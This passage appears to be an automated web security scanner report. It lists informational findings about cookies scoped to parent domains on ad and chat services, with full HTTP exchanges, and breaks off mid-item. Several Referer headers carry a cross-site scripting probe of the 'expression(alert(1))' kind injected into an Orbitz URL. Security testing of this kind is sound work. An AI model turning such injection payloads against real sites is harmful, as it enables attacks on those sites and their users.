<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.221. http://sales.liveperson.net/hc/15744040/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/15744040/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101423669632-1296573858:0; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net
LivePersonID=-16101423669632-1296573858:-1:-1:-1:-1; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagStartPage&lpCallId=567400305531-324853997910&protV=20&lpjson=1&page=http%3A//www.orbitz.com/shop/hotelsearch%3Ftype%3Dhotel%26hotel.typeOfSearch%3Dkeyword%26hotel.locationKeywordInput.key%3DBoston%252C%2BMA%252C%2BUnited%2BStates%26hotel.locId%3Dloc.pid%253A11231%26hotel.locationAddressInput.addressInput.countryCode%3DUS%26hotel.locationAddressInput.addressInput.addressLine1%3D%26hotel.locationAddressInput.addressInput.city%3D%26hotel.locationAddressInput.addressInput.stateProvinceCode%3D%26hotel.locationAddressInput.addressInput.postalCode%3D%26hotel.hotelSearchDetails.checkinDate%3D02%252F01%252F11%26hotel.hotelSearchDetails.checkoutDate%3D02%252F02%252F11%26hotel.hotelSearchDetails.numberOfRooms%3D1%26hotel.hotelSearchDetails.rooms%255B0%255D.numberOfAdults%3D2%26hotel.hotelSearchDetails.rooms%255B1%255D.numberOfAdults%3D1%26hotel.hotelSearchDetails.rooms%255B2%255D.numberOfAdults%3D1%26hotel.hotelSearchDetails.rooms%255B3%255D.numberOfAdults%3D1%26hotel.hotelRating%3D%26hotel.hotelChain%3D%26hotel.hotelName%3D%26hotel.couponCode%3D%26search%3DSearch&id=2998336854&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotel-obtz-english&activePlugin=none&cobrowse=true&PV%21unit=hotel-obtz&PV%21Section=Hotel&PV%21DestinationCityS=Boston%2C%20MA&PV%21CheckInDate=2011/02/01&PV%21CheckOutDate=2011/02/02&PV%21DayOfDeparture=Tuesday&PV%21AdvancedPurchase=0&PV%21RoomsRequested=1&PV%21HotelGuests=2&PV%21ConversionStage=showHotelResults&PV%21PriceChange=&PV%21CartTotal=&PV%21FirstName=&PV%21LastName=&PV%21ErrorInvite=0&PV%21ErrorCounter=0&PV%21pageLoadTime=7%20sec&PV%21visitorActive=1&SV%21language=english&VV%21VisitorID=&title=Boston%20-%20Hotel%20Search%20Results%20-%20www.orbitz.com&referrer=http%3A//www.orbitz.com/hotels/%3Fz%3D4fae%26r%3D1o HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=699244399384198284; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickACTIVE=1296573857200

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:24:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296573858:0; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net
Set-Cookie: HumanClickKEY=699244399384198284; path=/hc/15744040
Set-Cookie: HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
Set-Cookie: LivePersonID=-16101423669632-1296573858:-1:-1:-1:-1; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 01 Feb 2011 15:24:18 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"567400305531-324853997910","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

11.222. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=1524e3b5f366319b:TM=1296661266:LM=1296661266:S=-zH5XuNrRNUiArmn; expires=Fri, 01-Feb-2013 15:41:06 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scholar?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.223. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:31:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=84&partnerUID=DTQke7T999Y4qYJB&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=219
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; segments="3391|3392|11262|11265|30353|17277|38781|38582,1298044270|40657|10102"; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071+ \"4\": 1296660699}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 02 Feb 2011 15:31:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 02-Feb-2011 15:31:21 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:31:41 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.224. http://segment-pixel.invitemedia.com/setuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/setuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:17:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setuid?exchange_id=2&exchange_uid=4760492999213801733 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=219
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; segments="3391|3392|11262|11265|30353|17277|38781|38582,1298044270|40657|10102"; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296659838+ 1+ 1296659838+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296659838+ \"1ee066ea-76f9-385d-96fe-f45757cf8684\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296659898+ 1+ 1296659838+ 1+ 1296659838+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 02 Feb 2011 15:17:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 02-Feb-2011 15:16:59 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:17:19 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.225. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21091_1565598199=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=cef&ktextColor=000&klinkColor=36f&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A52&ranreq=0.955018284235438&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=945x813&adVisibility=2 HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: showads.pubmatic.com
Proxy-Connection: Keep-Alive
Cookie: KADUSERCOOKIE=6ED7458B-124F-41DA-AB44-CFEB2571210A; pubfreq_26269=; KTPCACOOKIE=YES; KRTBCOOKIE_107=1118-uid:4b88ae49f24ac1a48f002d3ae1cbd0c2&KRTB&1471-uid:4b88ae49f24ac1a48f002d3ae1cbd0c2; PUBRETARGET=571_1391018838

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:15 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:15 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:15 GMT; path=/
Set-Cookie: pubfreq_26263_21091_1565598199=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:15 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:15 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1540

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.226. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21091_7175966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:23:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:23:09 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:23:09 GMT; path=/
Set-Cookie: pubfreq_26263_21091_7175966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:09 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:23:09 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1536

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.227. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21091_156876156=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:46 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:22:46 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:22:46 GMT; path=/
Set-Cookie: pubfreq_26263_21091_156876156=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:46 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:22:46 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1541

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.228. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21090_577101722=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21090&kadwidth=300&kadheight=250&prevkadIds=21091&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263&kltstamp=2011-1-1%209%3A23%3A33&ranreq=0.8605180159211159&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; pubfreq_26263=; pubtime_26263=TMC; pubfreq_26263_21091_156876156=207-1; PMDTSHR=cat:; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:12 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263_21090_577101722=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:12 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:12 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1537

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.229. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21090_1782538825=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:50 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263_21090_1782538825=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:50 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:22:50 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1537

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.230. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_26263_21090_1148357966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21090&kadwidth=300&kadheight=250&prevkadIds=21091&kbgColor=fff&ktextColor=000&klinkColor=36f&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263&kltstamp=2011-1-1%209%3A23%3A55&ranreq=0.3079839600657333&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=945x733&adVisibility=2 HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: showads.pubmatic.com
Proxy-Connection: Keep-Alive
Cookie: KADUSERCOOKIE=6ED7458B-124F-41DA-AB44-CFEB2571210A; pubfreq_26269=; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_107=1118-uid:4b88ae49f24ac1a48f002d3ae1cbd0c2&KRTB&1471-uid:4b88ae49f24ac1a48f002d3ae1cbd0c2; PUBRETARGET=571_1391018838; pubfreq_26263=; pubtime_26263=TMC; pubfreq_26263_21091_7175966=207-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:23:12 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263_21090_1148357966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:12 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Wed, 02-Feb-2011 15:23:12 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1537

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame22624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...

11.231. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

